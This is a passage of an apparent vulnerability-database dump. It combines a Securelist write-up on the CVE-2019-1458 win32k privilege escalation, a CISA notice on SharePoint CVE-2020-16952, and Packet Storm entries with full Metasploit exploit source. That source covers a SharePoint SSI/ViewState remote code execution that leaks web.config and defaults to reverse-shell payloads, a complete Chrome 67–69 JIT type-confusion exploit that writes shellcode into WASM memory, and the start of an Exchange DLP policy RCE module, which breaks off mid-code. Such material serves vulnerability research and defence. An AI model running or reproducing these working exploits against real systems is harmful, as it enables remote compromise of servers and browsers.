class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. 
Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) where pre-initialized extra data can lead to system procedures handling it incorrectly. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH and FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: first you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. 
It results in an fnIndex equal to 6, which is the function index of _xxxSwitchWndProc_, and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. 
To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating an Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares a Switch Window and uses the vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). 
The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search of the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post-exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. 
The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2020-12-18T18:06:53", "bulletinFamily": "info", "cvelist": ["CVE-2020-16952"], "description": "The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an [Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) to address a vulnerability\u2014CVE-2020-16952\u2014affecting Microsoft SharePoint server. An attacker could exploit this vulnerability to take control of an affected system. Applying patches from Microsoft\u2019s October 2020 Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) can prevent exploitation of this vulnerability.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the [NCSC Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) and the Microsoft Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) for more information.\n", "modified": "2020-10-16T00:00:00", "published": "2020-10-16T00:00:00", "id": "CISA:48962A3B37B032DCF622B3E3135B8A1A", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability", "type": "cisa", "title": "NCSC Releases Alert on Microsoft SharePoint Vulnerability", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-19T16:33:40", "description": "", "published": "2020-10-19T00:00:00", "type": "packetstorm", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "PACKETSTORM:159612", "href": "https://packetstormsecurity.com/files/159612/Microsoft-SharePoint-SSI-ViewState-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE', \n'Description' => %q{ \nThis module exploits a server-side include (SSI) in SharePoint to leak \nthe web.config file and forge a malicious ViewState with the extracted \nvalidation key. \n \nThis exploit is authenticated and requires a user with page creation \nprivileges, which is a standard permission in SharePoint. \n \nThe web.config file will be stored in loot once retrieved, and the \nVALIDATION_KEY option can be set to short-circuit the SSI and trigger \nthe ViewState deserialization. \n \nTested against SharePoint 2019 on Windows Server 2016. 
\n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16952'], \n['URL', 'https://srcincite.io/advisories/src-2020-0022/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952'] \n], \n'DisclosureDate' => '2020-10-13', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'DotNetGadgetChain' => :TypeConfuseDelegate \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('VALIDATION_KEY', [false, 'ViewState validation key']), \n# \"Promote\" these advanced options so we don't have to pass around our own \nOptString.new('HttpUsername', [false, 'SharePoint username']), \nOptString.new('HttpPassword', [false, 'SharePoint password']) \n]) \nend \n \ndef post_auth? 
\ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef vuln_builds \n[ \n[Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013 \n[Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016 \n[Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019 \n] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Hat tip @tsellers-r7 \n# \n# MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly \nunless (build_header = res.headers['MicrosoftSharePointTeamServices']) \nreturn CheckCode::Unknown('Target does not appear to be running SharePoint.') \nend \n \nunless (build = build_header.scan(/^([\\d.]+):/).flatten.first) \nreturn CheckCode::Detected('Target did not respond with SharePoint build.') \nend \n \nif vuln_builds.any? 
{ |build_range| Gem::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\") \nend \n \ndef exploit \nunless username && password \nfail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation') \nend \n \nif (@validation_key = datastore['VALIDATION_KEY']) \nprint_status(\"Using ViewState validation key #{@validation_key}\") \nelse \ncreate_ssi_page \nleak_web_config \nend \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef create_ssi_page \nprint_status(\"Creating page for SSI: #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'PUT', \n'uri' => ssi_path, \n'data' => ssi_page \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless [200, 201].include?(res.code) \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\") \nend \n \nfail_with(Failure::NotFound, 'Failed to create page') \nend \n \nprint_good('Successfully created page') \n@page_created = true \nend \n \ndef leak_web_config \nprint_status('Leaking web.config') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => ssi_path, \n'headers' => { \nssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\") \nend \n \nunless (web_config = res.get_xml_document.at('//configuration')) \nfail_with(Failure::NotFound, 'Failed 
to extract web.config from response') \nend \n \nprint_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\") \n \nunless (@validation_key = extract_viewstate_validation_key(web_config)) \nfail_with(Failure::NotFound, 'Failed to extract ViewState validation key') \nend \n \nprint_good(\"ViewState validation key: #{@validation_key}\") \nensure \ndelete_ssi_page if @page_created \nend \n \ndef delete_ssi_page \nprint_status(\"Deleting #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'DELETE', \n'uri' => ssi_path, \n'partial' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 204 \nprint_warning('Failed to delete page') \nreturn \nend \n \nprint_good('Successfully deleted page') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'), \n'vars_post' => { \n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx \nalgo: 'sha256', \nkey: pack_viewstate_validation_key(@validation_key) \n) \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good('Successfully executed command') \nend \n \ndef ssi_page \n<<~XML \n<WebPartPages:DataFormWebPart runat=\"server\"> \n<ParameterBindings> \n<ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" /> \n</ParameterBindings> \n<xsl> \n<xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"> \n<xsl:param name=\"#{ssi_param}\" /> \n<xsl:template 
match=\"/\"> \n<xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" /> \n</xsl:template> \n</xsl:stylesheet> \n</xsl> \n</WebPartPages:DataFormWebPart> \nXML \nend \n \ndef ssi_path \n@ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\") \nend \n \ndef ssi_header \n@ssi_header ||= rand_text_alphanumeric(8..42) \nend \n \ndef ssi_param \n@ssi_param ||= rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/159612/sharepoint_ssi_viewstate.rb.txt"}, {"lastseen": "2020-03-06T22:52:32", "description": "", "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156640", "href": "https://packetstormsecurity.com/files/156640/Google-Chrome-67-68-69-Object.create-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit', \n'Description' => %q{ \nThis modules exploits a type confusion in Google Chromes JIT compiler. \nThe Object.create operation can be used to cause a type confusion between a \nPropertyArray and a NameDictionary. \nThe payload is executed within the rwx region of the sandboxed renderer \nprocess, so the browser must be run with the --no-sandbox option for the \npayload to work. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', # discovery and exploit \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2018-17463'], \n['URL', 'http://www.phrack.org/papers/jit_exploitation.html'], \n['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'], \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => ['windows', 'osx'], \n'DefaultTarget' => 0, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Sep 25 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \n \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] \" + request.body) \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \n \njscript = %Q^ \nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]); \n \nlet ab = new ArrayBuffer(8); \nlet floatView = new Float64Array(ab); \nlet uint64View = new BigUint64Array(ab); \nlet uint8View = new Uint8Array(ab); \n \nNumber.prototype.toBigInt = function toBigInt() { \nfloatView[0] = this; \nreturn uint64View[0]; \n}; \n \nBigInt.prototype.toNumber = function toNumber() { \nuint64View[0] = this; \nreturn floatView[0]; \n}; \n \nfunction hex(n) { \nreturn '0x' + n.toString(16); \n}; \n \nfunction fail(s) { \nprint('FAIL ' + s); \nthrow null; \n} \n \nconst NUM_PROPERTIES = 32; \nconst MAX_ITERATIONS = 100000; \n \nfunction gc() { \nfor (let i = 0; i < 200; i++) { \nnew ArrayBuffer(0x100000); \n} \n} \n \nfunction make(properties) { \nlet o = {inline: 42} // TODO \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \neval(`o.p${i} = properties[${i}];`); \n} 
\nreturn o; \n} \n \nfunction pwn() { \nfunction find_overlapping_properties() { \nlet propertyNames = []; \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \npropertyNames[i] = `p${i}`; \n} \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \n${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')} \nreturn [${propertyNames.join(', ')}]; \n} \n`); \n \nlet propertyValues = []; \nfor (let i = 1; i < NUM_PROPERTIES; i++) { \npropertyValues[i] = -i; \n} \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \nlet r = vuln(make(propertyValues)); \nif (r[1] !== -1) { \nfor (let i = 1; i < r.length; i++) { \nif (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) { \nreturn [i, -r[i]]; \n} \n} \n} \n} \n \nfail(\"Failed to find overlapping properties\"); \n} \n \nfunction addrof(obj) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nreturn o.p${p1}.x1; \n} \n`); \n \nlet propertyValues = []; \npropertyValues[p1] = {x1: 13.37, x2: 13.38}; \npropertyValues[p2] = {y1: obj}; \n \nlet i = 0; \nfor (; i < MAX_ITERATIONS; i++) { \nlet res = vuln(make(propertyValues)); \nif (res !== 13.37) \nreturn res.toBigInt() \n} \n \nfail(\"Addrof failed\"); \n} \n \nfunction corrupt_arraybuffer(victim, newValue) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nlet orig = o.p${p1}.x2; \no.p${p1}.x2 = ${newValue.toNumber()}; \nreturn orig; \n} \n`); \n \nlet propertyValues = []; \nlet o = {x1: 13.37, x2: 13.38}; \npropertyValues[p1] = o; \npropertyValues[p2] = victim; \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \no.x2 = 13.38; \nlet r = vuln(make(propertyValues)); \nif (r !== 13.38) \nreturn r.toBigInt(); \n} \n \nfail(\"Corrupt ArrayBuffer failed\"); \n} \n \nlet [p1, p2] = find_overlapping_properties(); \nprint(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`); \n \nlet memview_buf = new ArrayBuffer(1024); \nlet driver_buf = new ArrayBuffer(1024); \n \ngc(); \n \nlet memview_buf_addr 
= addrof(memview_buf); \nmemview_buf_addr--; \nprint(`ArrayBuffer @ ${hex(memview_buf_addr)}`); \n \nlet original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr); \n \nlet driver = new BigUint64Array(driver_buf); \nlet original_memview_buf_ptr = driver[4]; \n \nlet memory = { \nwrite(addr, bytes) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nmemview.set(bytes); \n}, \nread(addr, len) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nreturn memview.subarray(0, len); \n}, \nreadPtr(addr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nreturn memview[0]; \n}, \nwritePtr(addr, ptr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nmemview[0] = ptr; \n}, \naddrof(obj) { \nmemview_buf.leakMe = obj; \nlet props = this.readPtr(memview_buf_addr + 8n); \nreturn this.readPtr(props + 15n) - 1n; \n}, \n}; \n \n// Generate a RWX region for the payload \nfunction get_wasm_instance() { \nvar buffer = new Uint8Array([ \n0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0, \n1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128, \n128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104, \n101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11 \n]); \nreturn new WebAssembly.Instance(new WebAssembly.Module(buffer),{}); \n} \n \nlet wasm_instance = get_wasm_instance(); \nlet wasm_addr = memory.addrof(wasm_instance); \nprint(\"wasm_addr @ \" + hex(wasm_addr)); \nlet wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n); \nprint(\"wasm_rwx @ \" + hex(wasm_rwx_addr)); \n \nmemory.write(wasm_rwx_addr, shellcode); \n \nlet fake_vtab = new ArrayBuffer(0x80); \nlet fake_vtab_u64 = new BigUint64Array(fake_vtab); \nlet fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n); \n \nlet div = document.createElement('div'); \nlet div_addr = memory.addrof(div); \nprint('div_addr @ ' + hex(div_addr)); \nlet el_addr = 
memory.readPtr(div_addr + 0x20n); \nprint('el_addr @ ' + hex(div_addr)); \n \nfake_vtab_u64.fill(wasm_rwx_addr, 6, 10); \nmemory.writePtr(el_addr, fake_vtab_addr); \n \nprint('Triggering...'); \n \n// Trigger virtual call \ndiv.dispatchEvent(new Event('click')); \n \n// We are done here, repair the corrupted array buffers \nlet addr = memory.addrof(driver_buf); \nmemory.writePtr(addr + 32n, original_driver_buf_ptr); \nmemory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr); \n} \n \npwn(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156640/chrome_object_create.rb.txt"}, {"lastseen": "2020-09-17T14:42:19", "description": "", "published": "2020-09-17T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-16875"], "modified": "2020-09-17T00:00:00", "id": "PACKETSTORM:159210", "href": "https://packetstormsecurity.com/files/159210/Microsoft-Exchange-Server-DlpUtils-AddTenantDlpPolicy-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < 
Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE', \n'Description' => %q{ \nThis vulnerability allows remote attackers to execute arbitrary code \non affected installations of Exchange Server. Authentication is \nrequired to exploit this vulnerability. Additionally, the target user \nmust have the \"Data Loss Prevention\" role assigned and an active \nmailbox. \n \nIf the user is in the \"Compliance Management\" or greater \"Organization \nManagement\" role groups, then they have the \"Data Loss Prevention\" \nrole. Since the user who installed Exchange is in the \"Organization \nManagement\" role group, they transitively have the \"Data Loss \nPrevention\" role. \n \nThe specific flaw exists within the processing of the New-DlpPolicy \ncmdlet. The issue results from the lack of proper validation of \nuser-supplied template data when creating a DLP policy. An attacker \ncan leverage this vulnerability to execute code in the context of \nSYSTEM. \n \nTested against Exchange Server 2016 CU14 on Windows Server 2016. 
\n}, \n'Author' => [ \n'mr_me', # Discovery, exploits, and most of the words above \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16875'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875'], \n['URL', 'https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016'], \n['URL', 'https://srcincite.io/advisories/src-2020-0019/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16875.py.txt'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt'] \n], \n'DisclosureDate' => '2020-09-08', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Exchange Server 2016 and 2019 w/o KB4577352', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https', \n'HttpClientTimeout' => 5, \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nACCOUNT_LOCKOUTS, # Creates a concurrent OWA session \nCONFIG_CHANGES, # Creates a new DLP policy \nARTIFACTS_ON_DISK # Uses a DLP policy template file \n] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('USERNAME', [false, 'OWA username']), \nOptString.new('PASSWORD', [false, 'OWA password']) \n]) \nend \n \ndef post_auth? 
